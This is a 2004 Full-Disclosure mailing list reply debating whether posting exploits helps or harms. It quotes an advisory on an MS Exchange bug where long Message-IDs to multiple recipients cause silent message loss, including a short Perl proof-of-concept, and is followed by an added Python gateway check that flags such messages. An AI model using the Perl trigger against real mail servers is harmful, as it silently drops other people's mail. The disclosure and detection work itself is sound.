Message-ID: <200405130145.i4D1j3428741@netsys.com>
From: randallm at fidmail.com (RandallM)
Subject: RE: Full-Disclosure MS Exchange message lost-so lets post how

I am using the following only as an example that has been slightly discussed
here. The gentleman rightly posts and gives us the information that is very
helpful to be aware of. But then posts the "exploit" example because, in his
own words, 

<|>I think some people know how to use this "FEATURE" ...  I hope this post
<|>will speed up the fix release!

Exactly in what way do you think this should speed up the release? 

Granted, this is a "lost" email exploit. But what if it was a dangerous
exploit? I have seen these also posted.

I know of "script kiddies" who would never be able to find the exploit but
are part of the group who "know how to use this 'FEATURE'...". They watch
here and others just for that purpose. Where is accountability? I am torn
between this issue of needed knowledge and exposed exploit. As a network
administrator I have no need for the exploit but for the knowledge. I have
found no better place than here for that. Then on the other hand you all
give out the exploits for confirmation, which is needed also. Just some of my
personal inward ramblings.

thank you
Randall M
 

<|>--__--__--
<|>
<|>Message: 20
<|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
<|>From: I.D.S@....de
<|>To: full-disclosure@...ts.netsys.com
<|>Subject: [Full-Disclosure] MS Exchange message lost
<|>
<|>* MS Exchange duplicate message fault (message lost)
<|>*
<|>* MS Exchange (all versions affected) duplicate message fault
<|>*
<|>* I discovered this bug independently on 10, 2003
<|>*
<|>* public post 05, 2004
<|>*
<|>* Helmut Schmitz < i.d.s@....de >
<|>*
<|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET -  */
<|>
<|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
<|>messages with long message IDs (>189 bytes?) to more than one recipient
<|>(cc), the message will not be delivered correctly ... there is no correct
<|>logging !!, the messages will be delivered to only one recipient ... the
<|>message to the other will be lost !!
<|>
<|>I have sent this issue to Microsoft (10.2003) ... some months later
<|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
<|>some reg settings fixes (workaround ;-) the problem.
<|>
<|>Perl Example (test exploit) ...
<|>
<|>#!/usr/bin/perl -w
<|>use Net::SMTP;
<|>$from = 'sender@...rdomain.de';
<|>$to = 'user1@...rdomain.de';
<|>$cc = 'user2@...rdomain.de';
<|>$subject = 'Test Email';
<|>$smtp = Net::SMTP->new('yourmailserver');
<|>$smtp->mail($from);
<|>$smtp->to($to);
<|>$smtp->cc($cc);
<|>$smtp->data();
<|>$smtp->datasend("To: <$to>\n");
<|>$smtp->datasend("Cc: <$cc>\n");
<|>$smtp->datasend("From:  <$from>\n");
<|>$smtp->datasend("Subject: $subject\n");
<|>$smtp->datasend("Message-ID: <veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengeifeejktmhedgedherngrondljzhng>\n");
<|>$smtp->datasend("Hallo\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->dataend();
<|>$smtp->quit;
<|>
<|>Background:
<|>Duplicate detection is decided by three factors.  These are MessageID,
<|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
<|>store.  These are used to build a unique key when the message is
<|>submitted.
<|>If all the factors are the same value, then we recognize the message as
<|>duplicate.
<|>
<|>###################################
<|>
<|>I think some people know how to use this "FEATURE" ...  I hope this post
<|>will speed up the fix release!
<|>
<|>Regards,
<|>Helmut Schmitz


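A defender-side check, added here and not code from either post: it flags inbound mail that matches the trigger the quoted post describes (an over-long Message-ID on a message with more than one recipient), so such messages can be logged or held at the gateway instead of a copy silently disappearing. The 189-byte threshold is the post's own uncertain figure, and the sample message and example.invalid addresses are constructed for this example.

```python
import email
from email.utils import getaddresses

# Threshold taken from the quoted post ("long message ids (>189 bytes?)");
# the post marks the boundary as uncertain, so treat it as a tunable.
MAX_MESSAGE_ID_BYTES = 189

def recipient_addresses(msg):
    """Distinct, lower-cased addresses from all To/Cc/Bcc headers."""
    fields = []
    for name in ("To", "Cc", "Bcc"):
        fields.extend(msg.get_all(name, []))
    seen = []
    for _, addr in getaddresses(fields):
        addr = addr.lower()
        if addr and addr not in seen:
            seen.append(addr)
    return seen

def message_id_bytes(msg):
    """Byte length of the unfolded Message-ID value, 0 if absent."""
    mid = msg.get("Message-ID")
    if mid is None:
        return 0
    # Folded headers carry "\n " continuations; join the pieces first.
    return len("".join(mid.split()).encode("utf-8"))

def audit_message(raw):
    """Return (flagged, message_id_bytes, recipients) for one message (str).
    Flagged: Message-ID longer than MAX_MESSAGE_ID_BYTES and more than one
    recipient, the combination the quoted post reports as losing a copy."""
    msg = email.message_from_string(raw)
    mid_len = message_id_bytes(msg)
    rcpts = recipient_addresses(msg)
    return mid_len > MAX_MESSAGE_ID_BYTES and len(rcpts) > 1, mid_len, rcpts

# Constructed sample mirroring the quoted Perl test: To + Cc and an over-long
# Message-ID, folded over two lines the way a mail client might wrap it.
LONG_ID = "<" + "a" * 120 + "\n " + "b" * 120 + "@example.invalid>"
SAMPLE_RISKY = (
    "From: sender@example.invalid\n"
    "To: user1@example.invalid\n"
    "Cc: User2@example.invalid\n"
    "Subject: Test Email\n"
    "Message-ID:\n " + LONG_ID + "\n"
    "\n"
    "Hallo\n"
)

if __name__ == "__main__":
    print(audit_message(SAMPLE_RISKY))  # (True, 258, [two addresses])
```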